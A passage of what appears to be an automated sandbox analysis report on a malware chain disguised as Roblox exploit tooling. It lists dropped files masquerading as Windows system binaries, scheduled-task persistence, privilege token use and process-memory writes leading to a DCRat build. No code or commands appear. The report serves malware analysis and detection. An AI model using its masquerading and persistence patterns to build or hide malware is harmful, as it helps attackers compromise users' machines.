File created \??\c:\Program Files (x86)\Internet Explorer\ja-JP\smss.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
File created C:\Program Files (x86)\Microsoft.NET\RedistList\331d3f61e3e52a C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
File created C:\Program Files (x86)\Windows Portable Devices\33f6b6f444b053 C:\winNet\ComContainerbrowserRefRuntime.exe N/A
File created \??\c:\Program Files\Uninstall Information\SolaraBootstrapper.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Vss\Writers\Application\WmiPrvSE.exe C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
File opened for modification C:\Windows\Installer\MSID1AA.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Cursors\smss.exe C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
File opened for modification C:\Windows\Installer\ C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIE63C.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\e57cdef.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIF495.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Vss\Writers\Application\24dbde2999530e C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
File created C:\Windows\SKB\LanguageModels\RuntimeBroker.exe C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SKB\LanguageModels\9e8d7a4ca61bd9 C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
File created C:\Windows\Cursors\69ddcba757bf72 C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
File created C:\Windows\fr-FR\088424020bedd6 C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
File created \??\c:\Windows\Vss\Writers\Application\CSC1695FE976BC94F94849813BF48BB424.TMP C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
File opened for modification C:\Windows\Installer\MSID11B.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSID16A.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\fr-FR\conhost.exe C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
File created C:\Windows\Installer\SourceHash{EFA235B5-C6A1-42E6-9BC9-02A8D56F1CDC} C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\e57cdef.msi C:\Windows\system32\msiexec.exe N/A
File created \??\c:\Windows\SKB\LanguageModels\CSCF579D11E63E4D1AA25EA79FCBFF6CC.TMP C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
File created C:\Windows\Installer\inprogressinstallinfo.ipi C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\xdwd.dll C:\Users\Admin\AppData\Local\Temp\faildsfsdf.exe N/A
File created \??\c:\Windows\Vss\Writers\Application\WmiPrvSE.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
File created C:\Windows\OCR\en-us\RuntimeBroker.exe C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
File opened for modification C:\Windows\Installer\MSIF504.tmp C:\Windows\system32\msiexec.exe N/A
File created \??\c:\Windows\SKB\LanguageModels\RuntimeBroker.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\Frage build.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\solara.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings C:\winNet\ComContainerbrowserRefRuntime.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings C:\DriversavessessionDlldhcp\Roblox.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\faildsfsdf.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeImpersonatePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 5044 wrote to memory of 5072 N/A C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe C:\Users\Admin\AppData\Local\Temp\Youtube.exe
PID 5044 wrote to memory of 5072 N/A C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe C:\Users\Admin\AppData\Local\Temp\Youtube.exe
PID 5044 wrote to memory of 5072 N/A C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe C:\Users\Admin\AppData\Local\Temp\Youtube.exe
PID 5044 wrote to memory of 2568 N/A C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe C:\Users\Admin\AppData\Local\Temp\faildsfsdf.exe
PID 5044 wrote to memory of 2568 N/A C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe C:\Users\Admin\AppData\Local\Temp\faildsfsdf.exe
PID 5072 wrote to memory of 5100 N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe C:\Users\Admin\AppData\Local\Temp\Result.exe
PID 5072 wrote to memory of 5100 N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe C:\Users\Admin\AppData\Local\Temp\Result.exe
PID 5072 wrote to memory of 5100 N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe C:\Users\Admin\AppData\Local\Temp\Result.exe
PID 5072 wrote to memory of 4140 N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe
PID 5072 wrote to memory of 4140 N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe
PID 5072 wrote to memory of 4140 N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe
PID 5072 wrote to memory of 392 N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe C:\Users\Admin\AppData\Local\Temp\Bloxstrap.exe
PID 5072 wrote to memory of 392 N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe C:\Users\Admin\AppData\Local\Temp\Bloxstrap.exe
PID 5072 wrote to memory of 1660 N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe C:\Users\Admin\AppData\Local\Temp\Frage build.exe
PID 5072 wrote to memory of 1660 N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe C:\Users\Admin\AppData\Local\Temp\Frage build.exe
PID 5072 wrote to memory of 1660 N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe C:\Users\Admin\AppData\Local\Temp\Frage build.exe
PID 5100 wrote to memory of 3012 N/A C:\Users\Admin\AppData\Local\Temp\Result.exe C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
PID 5100 wrote to memory of 3012 N/A C:\Users\Admin\AppData\Local\Temp\Result.exe C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
PID 5100 wrote to memory of 3012 N/A C:\Users\Admin\AppData\Local\Temp\Result.exe C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
PID 5100 wrote to memory of 3504 N/A C:\Users\Admin\AppData\Local\Temp\Result.exe C:\Users\Admin\AppData\Local\Temp\solara.exe
PID 5100 wrote to memory of 3504 N/A C:\Users\Admin\AppData\Local\Temp\Result.exe C:\Users\Admin\AppData\Local\Temp\solara.exe
PID 5100 wrote to memory of 3504 N/A C:\Users\Admin\AppData\Local\Temp\Result.exe C:\Users\Admin\AppData\Local\Temp\solara.exe
PID 4140 wrote to memory of 1452 N/A C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe C:\Windows\SysWOW64\WScript.exe
PID 4140 wrote to memory of 1452 N/A C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe C:\Windows\SysWOW64\WScript.exe
PID 4140 wrote to memory of 1452 N/A C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe C:\Windows\SysWOW64\WScript.exe
PID 1660 wrote to memory of 904 N/A C:\Users\Admin\AppData\Local\Temp\Frage build.exe C:\Windows\SysWOW64\WScript.exe
PID 1660 wrote to memory of 904 N/A C:\Users\Admin\AppData\Local\Temp\Frage build.exe C:\Windows\SysWOW64\WScript.exe
PID 1660 wrote to memory of 904 N/A C:\Users\Admin\AppData\Local\Temp\Frage build.exe C:\Windows\SysWOW64\WScript.exe
PID 3504 wrote to memory of 3112 N/A C:\Users\Admin\AppData\Local\Temp\solara.exe C:\Windows\System32\Conhost.exe
PID 3504 wrote to memory of 3112 N/A C:\Users\Admin\AppData\Local\Temp\solara.exe C:\Windows\System32\Conhost.exe
PID 3504 wrote to memory of 3112 N/A C:\Users\Admin\AppData\Local\Temp\solara.exe C:\Windows\System32\Conhost.exe
PID 3112 wrote to memory of 1072 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 3112 wrote to memory of 1072 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 3112 wrote to memory of 1072 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 1072 wrote to memory of 4084 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe
PID 1072 wrote to memory of 4084 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe
PID 3012 wrote to memory of 4476 N/A C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe C:\Windows\SysWOW64\msiexec.exe
PID 3012 wrote to memory of 4476 N/A C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe C:\Windows\SysWOW64\msiexec.exe
PID 3012 wrote to memory of 4476 N/A C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe C:\Windows\SysWOW64\msiexec.exe
PID 2424 wrote to memory of 3592 N/A C:\Windows\system32\msiexec.exe C:\Windows\System32\MsiExec.exe
PID 2424 wrote to memory of 3592 N/A C:\Windows\system32\msiexec.exe C:\Windows\System32\MsiExec.exe
PID 2424 wrote to memory of 4396 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2424 wrote to memory of 4396 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2424 wrote to memory of 4396 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 4084 wrote to memory of 388 N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4084 wrote to memory of 388 N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4084 wrote to memory of 1116 N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4084 wrote to memory of 1116 N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4084 wrote to memory of 3680 N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4084 wrote to memory of 3680 N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4084 wrote to memory of 828 N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4084 wrote to memory of 828 N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4084 wrote to memory of 1996 N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4084 wrote to memory of 1996 N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4084 wrote to memory of 3380 N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4084 wrote to memory of 3380 N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4084 wrote to memory of 400 N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe C:\Windows\system32\schtasks.exe
PID 4084 wrote to memory of 400 N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe C:\Windows\system32\schtasks.exe
PID 4084 wrote to memory of 3688 N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4084 wrote to memory of 3688 N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4084 wrote to memory of 416 N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4084 wrote to memory of 416 N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
